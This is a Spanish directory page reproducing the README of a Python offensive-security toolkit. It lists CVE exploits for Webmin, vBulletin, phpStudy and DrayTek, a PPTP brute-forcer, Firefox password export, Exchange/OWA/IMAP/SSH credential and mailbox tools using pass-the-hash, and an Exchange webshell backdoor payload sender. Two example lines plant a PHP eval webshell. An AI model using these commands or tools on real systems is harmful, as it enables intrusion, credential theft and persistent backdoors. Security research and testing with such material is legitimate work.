Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Homework-of-Python — Códigos Python de mi blog. | Kitploit
Herramientas/GitHubGitHub/3gstudent/homework-of-python
Escáneres de VulnerabilidadesAtaques de ContraseñasExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónRed TeamingDesarrollo de Payloads
GitHub3gstudent/homework-of-python

Homework-of-Python

Códigos Python de mi blog.

Ver Repositorio
41212618hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Homework-of-Python

Códigos Python de mi blog.

pptp_password_hack.py

Usa un ataque de fuerza bruta para obtener la contraseña de la VPN PPTP.

Leerá las contraseñas del archivo (llamado wordlist) y luego usará pptpsetup para conectarse al servidor.

El intervalo de tiempo es de 10 segundos.


portscan.py

Se usa para escanear puertos.

El tiempo de espera es de 3 segundos.

versión en c++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Se usa para obtener la IP a partir de la URL.

Se puede usar directamente el resultado de Sublist3r.

file_deduplication(For_urltoip).py

Se usa para eliminar IP duplicadas del resultado de Sublist3r.

Se puede usar directamente el resultado de urltoip.py.

Las IP se pueden ordenar usando Sublime (F9).


file_deduplication.py

Se usa para eliminar elementos duplicados de un archivo.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Referencia:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Se usa para llamar a la API de fofa e imprimir las IP de los resultados.

Puedes obtener 100 resultados.

fofa_api_VIP.py

Se usa para llamar a la API de fofa e imprimir las IP de los resultados.

Si eres VIP, obtendrás 10000 resultados.


vBulletin_5.x_0day_pre-auth_RCE.py

Referencia:

https://seclists.org/fulldisclosure/2019/Sep/31

Ej.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Referencia:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Ej.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Se usa para exportar las contraseñas de Firefox.

get_Exchange_version.py

Se usa para obtener la versión de Exchange.

Primero obtén el BuildNumber a través del código fuente de la URL y luego obtén la versión.

Referencia:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Se usa para escanear la vulnerabilidad RCE de SMBv3.

El tiempo de espera es de 3 segundos.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Referencia:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Los dispositivos DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta y Vigor300B 1.3.3_Beta, 1.4.2.1_Beta y 1.4.4_Beta permiten la ejecución remota de código como root (sin autenticación) mediante metacaracteres de shell en la URI cgi-bin/mainfunction.cgi..

Productos afectados:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Usa la API SOAP de Zimbra para conectarte al servidor de correo de Zimbra.

Uso:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

modo:

  • low autenticación para token bajo
  • admin autenticación para token de administrador
  • ssrf Usa CVE-2019-9621 para obtener el token de administrador

Ej:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Se usa para comprobar cuentas válidas de Exchange Web Service (soporta texto plano y ntlmhash)

Referencia:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Uso:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Ej.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Se usa para acceder a Autodiscover.xml y obtener la configuración del usuario (soporta texto plano y ntlmhash)

Uso:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Ej.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Modo extra de checkAutodiscover.py

Añade un parámetro

ewsManage.py

Se usa para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

Uso:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Ej.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Se usa para comprobar credenciales válidas de SSH (soporta contraseña y archivo de clave privada)

Uso:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Ej.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Ejecución remota de comandos a través de SSH (soporta contraseña y archivo de clave privada)

Uso:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Ej.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Se usa para comprobar credenciales válidas de EAS (Exchange Server ActiveSync)

Uso:

easCheck.py <host> <user> <password>

Ej.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Se usa para comprobar cuentas válidas de Exchange conectándose a OWA.

Uso:

checkOWA.py <url> <user> <password>

owaManage.py

Se usa para leer correos conectándose a OWA.

Uso:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Usa IMAP para conectarse al servidor de correo.

Uso:

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Se usa para implementar autenticación NTLM y comunicarse con execCmd.aspx

Los datos de comunicación están codificados con Base64

Uso:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Versión en C#: SharpExchangeBackdoor.cs

Se usa para enviar payload a la webshell backdoor de Exchange.

Soporta:

  • assemblyLoad
  • webshellWrite

Uso:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

ej.

Descargar herramienta